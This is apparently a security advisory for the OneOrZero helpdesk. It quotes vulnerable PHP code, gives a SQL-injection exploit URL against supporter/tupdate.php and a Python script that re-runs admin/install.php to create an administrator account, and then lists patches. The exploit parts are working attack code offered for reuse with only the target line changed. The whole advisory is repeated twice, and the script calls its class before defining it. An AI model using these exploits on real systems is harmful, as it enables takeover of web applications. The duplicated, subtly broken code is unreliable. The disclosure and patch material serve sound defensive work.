CourtneyDS
Problems :
- SQL Injection
- Admin Access
PHP Code/Location :
supporter/tupdate.php :
// As quoted, $sg and $id are interpolated into the UPDATE unquoted and
// unescaped; the advisory's exploit URL supplies both as GET parameters
// (register_globals), so extra "column=value" pairs can ride in on $sg.
// addslashes() does not help in this unquoted numeric context: cast both
// with (int) or use a prepared statement, and check that the caller is
// allowed to edit ticket $id at all.
if($groupid == 'change'){
    $sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
    $result = $db->query($sql);
}
admin/install.php :
[...]
if($step == 2){
echo "
";
start("Helpdesk Installation", "center");
// Validation for installation step 2; the enclosing if($step == 2){ opens
// above this run and its closing brace lies outside the excerpt.
// Every check here is about presence/format of a posted field. None asks
// whether the caller is authenticated or whether the application is
// already installed, so the step can be replayed after deployment
// (the advisory's second issue).
if($HTTP_POST_VARS['first'] == ''){
    showError("first name");
    $flag = 1;
}
if($HTTP_POST_VARS['last'] == ''){
    showError("last name");
    $flag = 1;
}
if($HTTP_POST_VARS['user'] == ''){
    showError("user name");
    $flag = 1;
}
if($HTTP_POST_VARS['email'] == ''){
    showError("email address");
    $flag = 1;
}
if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
    showError("password");
    $flag = 1;
}
if($HTTP_POST_VARS['office'] == ''){
    showError("office");
    $flag = 1;
}
// checkPwd() and validEmail() are defined elsewhere; only their boolean
// result is used here.
if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
    showError("password");
    $flag = 1;
}
if(!validEmail($HTTP_POST_VARS['email'])){
    showError("email");
    $flag = 1;
}
// Any failed check above stops the step here.
if($flag == 1){
    endit();
    exit;
}
[...]
// Posted fields go into the INSERT by string concatenation, unescaped;
// with magic_quotes_gpc off a quote in any of them leaves the literal.
// The password is stored as unsalted md5(). The remaining column values
// (1, 1, 1, 'default', 'English', ...) are fixed by the script; the
// advisory states the resulting account is administrative, but the
// column meanings are not visible here — verify against the schema.
// Mitigation: a prepared statement, and refusing the whole step once a
// user row already exists.
$pwd = md5($HTTP_POST_VARS['pwd1']);
$query = "INSERT IGNORE into $mysql_users_table VALUES(NULL,
'".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."',
'".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '',
'".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."',
1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
$db->query($query);
[...]
Exploits :
http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
will change the description of the ticket number 10 into "abcd"
(char(97,98,99,100))
To exploit the second one, in Python 2.2:
import urlparse
import httplib
import string
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
class OneOrZero:
    """Proof-of-concept from the advisory: a single POST to admin/install.php.

    The body built in CreateAdminAccount carries step=2 and every field the
    quoted install.php validates, so validation passes and a user row is
    inserted.  Nothing here depends on the host except the URL; the cure is
    server-side (refuse step 2 once a user exists, and remove or protect
    admin/install.php after setup).  For detection, a POST to
    /admin/install.php on an already-installed site is the signal, and the
    fixed User-Agent below is a usable log indicator for this particular
    script.
    """

    def __init__(self,target,port,user,password):
        """Split *target* into host and path, then send the request at once.

        target   -- base URL of the installation (scheme://host/path)
        port     -- TCP port as a string; "" means 80
        user, password -- credentials the script asks install.php to store
        """
        if port != "":
            self.port=str(port)
        else :
            self.port="80"
        # urlparse() tuple: index 1 is the network location, index 2 the path
        self.path=str(urlparse.urlparse(target)[2])
        self.target=str(urlparse.urlparse(target)[1])
        self.user=str(user)
        self.password=str(password)
        # fixed User-Agent string sent with the request (see putheader below)
        self.USER_AGENT='OneOrZero.py'
        # the constructor itself performs the request
        self.CreateAdminAccount()

    def CreateAdminAccount(self):
        """POST the install form and print whether the success text came back.

        Returns nothing; the outcome is only printed.  The bare except at the
        end swallows every error, including network errors, so any failure
        is reported only as the generic message at the bottom.
        """
        # same field names install.php checks for emptiness; first/last/email/office are constants
        data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd'
        try :
            print "Connecting On "+self.target+"...\n"
            http=httplib.HTTP(self.target,self.port)
            print "Sending Data On "+self.target+"...\n"
            http.putrequest("POST",self.path+"/admin/install.php")
            http.putheader("Content-Type","application/x-www-form-urlencoded")
            http.putheader("User-Agent",self.USER_AGENT)
            http.putheader("Host",self.target)
            http.putheader("Content-Length",str(len(data)))
            http.endheaders()
            http.send(data)
            code,msg,headers = http.getreply()
            print "HTTP Code : ",str(code)
            print "HTTP Connection : ",msg
            print "HTTP headers : \n",headers,"\n"
            # success is judged purely by a substring of the response body
            file=http.getfile()
            if string.find(file.read(),"Administrator Account Created
Successfully.") != -1:
                print "Congratulations, Administrator Account Created
Successfully."
                print "You Can Log In Here :
http://"+self.target+self.path+"/admin/control.php"
                print "User : ",self.user
                print "Password : ",self.password
            else :
                print "Administrator Account Hasn't Been Created."
        except :
            print "Error During Admin Account Creation."
You just have to change the line :
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
Solution :
A patch (and more details in French) can be found at http://www.phpsecure.info.
- In supporter/tupdate.php, add the following lines at the beginning:
// Quoted patch: a request-wide input filter. Points to weigh before
// applying it:
//  - it is a blacklist (escape quotes, break every "(" so char()-style
//    expressions no longer parse), not a fix of the vulnerable query;
//    (int) casts on $sg/$id or prepared statements in tupdate.php are
//    the durable mitigation;
//  - ${$key} = $value re-creates register_globals for every request key,
//    which is itself a known risk (any global can be overwritten from
//    the query string);
//  - $_FILE and $HTTP_FILE_VARS are not PHP superglobals ($_FILES and
//    $HTTP_POST_FILES are), so those two lines are no-ops.
foreach ($_REQUEST as $key=>$value) {
    if (get_magic_quotes_gpc()==0) {
        $value = addslashes($value); // This will reproduce the option magic_quotes_gpc=1
    }
    // "(" becomes "()" so function-call syntax inside a value is broken
    $value = str_replace('(','()',$value);
    ${$key} = $value;
    $_REQUEST[$key] = $value;
    if (isset($_POST[$key])) { $_POST[$key] = $value; }
    if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
    if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
    if (isset($_GET[$key])) { $_GET[$key] = $value; }
    if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
    if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value;
    }
    if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
    if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
}
- In admin/install.php, insert the following lines:
// Quoted patch: refuse installation step 2 once any user row exists.
// It must sit before the validation and the INSERT so that no write can
// happen. SELECT COUNT(*) would be cheaper than fetching every row only
// to count them. This closes re-installation but is not authentication:
// if the users table is ever empty the step is open again, so
// admin/install.php should still be deleted or made inaccessible after
// setup.
$sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
$result = $db->query($sql);
$num_rows = $db->num_rows($result);
if ($num_rows > 0){
    die("OneOrZero Is Already Installed.");
}
just after the line:
if($step == 2){
Credit to eLtorO
Sincerely
CourtneyDS
- SQL Injection
- Admin Access
PHP Code/Location :
supporter/tupdate.php :
// As quoted, $sg and $id are interpolated into the UPDATE unquoted and
// unescaped; the advisory's exploit URL supplies both as GET parameters
// (register_globals), so extra "column=value" pairs can ride in on $sg.
// addslashes() does not help in this unquoted numeric context: cast both
// with (int) or use a prepared statement, and check that the caller is
// allowed to edit ticket $id at all.
if($groupid == 'change'){
    $sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
    $result = $db->query($sql);
}
admin/install.php :
[...]
if($step == 2){
echo "
";
start("Helpdesk Installation", "center");
// Validation for installation step 2; the enclosing if($step == 2){ opens
// above this run and its closing brace lies outside the excerpt.
// Every check here is about presence/format of a posted field. None asks
// whether the caller is authenticated or whether the application is
// already installed, so the step can be replayed after deployment
// (the advisory's second issue).
if($HTTP_POST_VARS['first'] == ''){
    showError("first name");
    $flag = 1;
}
if($HTTP_POST_VARS['last'] == ''){
    showError("last name");
    $flag = 1;
}
if($HTTP_POST_VARS['user'] == ''){
    showError("user name");
    $flag = 1;
}
if($HTTP_POST_VARS['email'] == ''){
    showError("email address");
    $flag = 1;
}
if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
    showError("password");
    $flag = 1;
}
if($HTTP_POST_VARS['office'] == ''){
    showError("office");
    $flag = 1;
}
// checkPwd() and validEmail() are defined elsewhere; only their boolean
// result is used here.
if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
    showError("password");
    $flag = 1;
}
if(!validEmail($HTTP_POST_VARS['email'])){
    showError("email");
    $flag = 1;
}
// Any failed check above stops the step here.
if($flag == 1){
    endit();
    exit;
}
[...]
// Posted fields go into the INSERT by string concatenation, unescaped;
// with magic_quotes_gpc off a quote in any of them leaves the literal.
// The password is stored as unsalted md5(). The remaining column values
// (1, 1, 1, 'default', 'English', ...) are fixed by the script; the
// advisory states the resulting account is administrative, but the
// column meanings are not visible here — verify against the schema.
// Mitigation: a prepared statement, and refusing the whole step once a
// user row already exists.
$pwd = md5($HTTP_POST_VARS['pwd1']);
$query = "INSERT IGNORE into $mysql_users_table VALUES(NULL,
'".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."',
'".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '',
'".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."',
1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
$db->query($query);
[...]
Exploits :
http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
will change the description of the ticket number 10 into "abcd"
(char(97,98,99,100))
To exploit the second one, in Python 2.2:
import urlparse
import httplib
import string
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
class OneOrZero:
    """Proof-of-concept from the advisory: a single POST to admin/install.php.

    The body built in CreateAdminAccount carries step=2 and every field the
    quoted install.php validates, so validation passes and a user row is
    inserted.  Nothing here depends on the host except the URL; the cure is
    server-side (refuse step 2 once a user exists, and remove or protect
    admin/install.php after setup).  For detection, a POST to
    /admin/install.php on an already-installed site is the signal, and the
    fixed User-Agent below is a usable log indicator for this particular
    script.
    """

    def __init__(self,target,port,user,password):
        """Split *target* into host and path, then send the request at once.

        target   -- base URL of the installation (scheme://host/path)
        port     -- TCP port as a string; "" means 80
        user, password -- credentials the script asks install.php to store
        """
        if port != "":
            self.port=str(port)
        else :
            self.port="80"
        # urlparse() tuple: index 1 is the network location, index 2 the path
        self.path=str(urlparse.urlparse(target)[2])
        self.target=str(urlparse.urlparse(target)[1])
        self.user=str(user)
        self.password=str(password)
        # fixed User-Agent string sent with the request (see putheader below)
        self.USER_AGENT='OneOrZero.py'
        # the constructor itself performs the request
        self.CreateAdminAccount()

    def CreateAdminAccount(self):
        """POST the install form and print whether the success text came back.

        Returns nothing; the outcome is only printed.  The bare except at the
        end swallows every error, including network errors, so any failure
        is reported only as the generic message at the bottom.
        """
        # same field names install.php checks for emptiness; first/last/email/office are constants
        data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd'
        try :
            print "Connecting On "+self.target+"...\n"
            http=httplib.HTTP(self.target,self.port)
            print "Sending Data On "+self.target+"...\n"
            http.putrequest("POST",self.path+"/admin/install.php")
            http.putheader("Content-Type","application/x-www-form-urlencoded")
            http.putheader("User-Agent",self.USER_AGENT)
            http.putheader("Host",self.target)
            http.putheader("Content-Length",str(len(data)))
            http.endheaders()
            http.send(data)
            code,msg,headers = http.getreply()
            print "HTTP Code : ",str(code)
            print "HTTP Connection : ",msg
            print "HTTP headers : \n",headers,"\n"
            # success is judged purely by a substring of the response body
            file=http.getfile()
            if string.find(file.read(),"Administrator Account Created
Successfully.") != -1:
                print "Congratulations, Administrator Account Created
Successfully."
                print "You Can Log In Here :
http://"+self.target+self.path+"/admin/control.php"
                print "User : ",self.user
                print "Password : ",self.password
            else :
                print "Administrator Account Hasn't Been Created."
        except :
            print "Error During Admin Account Creation."
You just have to change the line :
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
Solution :
A patch (and more details in French) can be found at http://www.phpsecure.info.
- In supporter/tupdate.php, add the following lines at the beginning:
// Quoted patch: a request-wide input filter. Points to weigh before
// applying it:
//  - it is a blacklist (escape quotes, break every "(" so char()-style
//    expressions no longer parse), not a fix of the vulnerable query;
//    (int) casts on $sg/$id or prepared statements in tupdate.php are
//    the durable mitigation;
//  - ${$key} = $value re-creates register_globals for every request key,
//    which is itself a known risk (any global can be overwritten from
//    the query string);
//  - $_FILE and $HTTP_FILE_VARS are not PHP superglobals ($_FILES and
//    $HTTP_POST_FILES are), so those two lines are no-ops.
foreach ($_REQUEST as $key=>$value) {
    if (get_magic_quotes_gpc()==0) {
        $value = addslashes($value); // This will reproduce the option magic_quotes_gpc=1
    }
    // "(" becomes "()" so function-call syntax inside a value is broken
    $value = str_replace('(','()',$value);
    ${$key} = $value;
    $_REQUEST[$key] = $value;
    if (isset($_POST[$key])) { $_POST[$key] = $value; }
    if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
    if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
    if (isset($_GET[$key])) { $_GET[$key] = $value; }
    if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
    if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value;
    }
    if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
    if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
}
- In admin/install.php, insert the following lines:
// Quoted patch: refuse installation step 2 once any user row exists.
// It must sit before the validation and the INSERT so that no write can
// happen. SELECT COUNT(*) would be cheaper than fetching every row only
// to count them. This closes re-installation but is not authentication:
// if the users table is ever empty the step is open again, so
// admin/install.php should still be deleted or made inaccessible after
// setup.
$sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
$result = $db->query($sql);
$num_rows = $db->num_rows($result);
if ($num_rows > 0){
    die("OneOrZero Is Already Installed.");
}
just after the line:
if($step == 2){
Credit to eLtorO
Sincerely
CourtneyDS